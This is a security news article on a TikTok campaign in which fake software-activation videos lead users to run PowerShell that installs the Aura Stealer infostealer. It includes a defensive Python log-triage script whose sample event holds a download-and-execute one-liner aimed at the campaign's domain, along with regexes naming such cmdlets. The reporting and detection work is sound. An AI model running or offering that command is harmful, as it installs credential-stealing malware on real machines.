Cybercriminals Target TikTok Users with Malware Disguised as Free Software
Cybercriminals are exploiting TikTok to deceive users into downloading malware disguised as free activation guides for popular software. This scam involves fake videos that claim to offer solutions for activating programs such as Windows, Microsoft 365, and even streaming services like Netflix and Spotify Premium. Security expert Xavier Mertens first identified this campaign, noting its resemblance to a scheme detected earlier this year.
According to a report from BleepingComputer, these fraudulent TikTok videos feature short PowerShell commands, instructing viewers to run them as administrators. While the videos promise to “activate” or “fix” software, they actually connect to malicious websites that distribute malware known as Aura Stealer. This malware surreptitiously gathers saved passwords, cookies, cryptocurrency wallets, and authentication tokens from the victim’s device.
Understanding the Scam
The current TikTok campaign employs a technique known as a ClickFix attack, a form of social engineering that misleads victims into believing they are following legitimate technical instructions. The process appears straightforward: run a simple command to gain instant access to premium software. However, the PowerShell commands actually link to a remote domain, slmgr[.]win, which downloads malicious executables hosted on Cloudflare.
The primary file involved in this attack, updater.exe, is a variant of Aura Stealer. Once executed, it searches for user credentials and sends the collected data back to the attackers. A second file, source.exe, utilizes Microsoft’s C# compiler to execute code directly in memory, making detection challenging. While the exact purpose of this second payload remains unclear, it follows patterns observed in previous malware designed for cryptocurrency theft and ransomware dissemination.
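For defenders, the behaviour described above can be turned into a simple triage rule over process-creation logs. The sketch below is an added example, not code from the report or from Mertens; the event field names (`image`, `parent`, `cmdline`, `elevated`), the sample events, and the Temp path are constructed assumptions, while the domain and `source.exe` come from the article.

```python
import re

# Indicators named in the article; the domain is written defanged there.
IOC_DOMAINS = {"slmgr.win"}
IOC_PARENT = "source.exe"  # file the article says drives the C# compiler

# PowerShell cmdlets/aliases that fetch remote content, and ones that run a string.
FETCH = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|"
                   r"downloadstring|downloadfile)\b", re.I)
EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
HOST = re.compile(r"\b([a-z0-9-]+(?:\.[a-z0-9-]+)+)\b", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage(event):
    """Return the reasons a process-creation event matches the described pattern."""
    cmd = event.get("cmdline", "").replace("[.]", ".")  # refang before matching
    image = basename(event.get("image", ""))
    reasons = []
    if image in ("powershell.exe", "pwsh.exe") and FETCH.search(cmd):
        if EXEC.search(cmd):
            reasons.append("download-and-execute one-liner")
        if event.get("elevated"):
            reasons.append("remote fetch from elevated PowerShell")
    hosts = {h.lower() for h in HOST.findall(cmd)}
    if any(h == d or h.endswith("." + d) for h in hosts for d in IOC_DOMAINS):
        reasons.append("domain named in the report")
    if image == "csc.exe" and basename(event.get("parent", "")) == IOC_PARENT:
        reasons.append("C# compiler started by file named in the report")
    return reasons

# Constructed sample events (hypothetical, not captured from the campaign).
EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c \"irm slmgr[.]win | iex\"", "elevated": True},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\Scripts\backup.ps1", "elevated": False},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "parent": r"C:\Users\user\AppData\Local\Temp\source.exe",
     "cmdline": "csc.exe /noconfig @options.cmdline"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(basename(ev["image"]), "->", triage(ev) or "no match")
```

A file name such as `source.exe` is a weak signal on its own, so the rule only fires when it is the parent of the C# compiler, which is the behaviour the report describes.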
Protecting Yourself Against TikTok Malware
Despite the convincing appearance of these scams, users can take specific steps to safeguard their devices and personal information. Here are some effective precautions:
1. **Avoid Shortcuts**: Refrain from copying or executing PowerShell commands from TikTok videos or unfamiliar websites. If a source promises free access to premium software, it is likely a trap.
2. **Use Trusted Sources**: Always download software directly from official websites or verified app stores.
3. **Keep Security Tools Updated**: Regularly update antivirus software and browsers to ensure they can detect the latest threats. Outdated security measures may leave systems vulnerable.
4. **Install Strong Antivirus Software**: Robust antivirus programs offer real-time scanning and protection against trojans, information stealers, and phishing attempts. This is essential for detecting malicious links and safeguarding personal data.
5. **Consider a Data Removal Service**: If your personal information is compromised, a data removal or monitoring service can alert you and assist in removing sensitive data from the internet. While no service can guarantee complete removal, these services actively monitor and erase personal information from various sites.
6. **Reset Credentials**: If you have followed dubious instructions or entered credentials after viewing a “free activation” video, immediately reset your passwords, starting with your email, financial, and social media accounts.
7. **Enable Multi-Factor Authentication**: Adding this extra layer of security can prevent unauthorized access, even if passwords are compromised.
The allure of free software can be tempting, but users must remain vigilant. Scams on platforms like TikTok highlight the importance of trusting verified sources and recognizing the risks associated with shortcuts. As Xavier Mertens warns, what may appear to be a helpful hack can jeopardize both security and personal peace of mind.
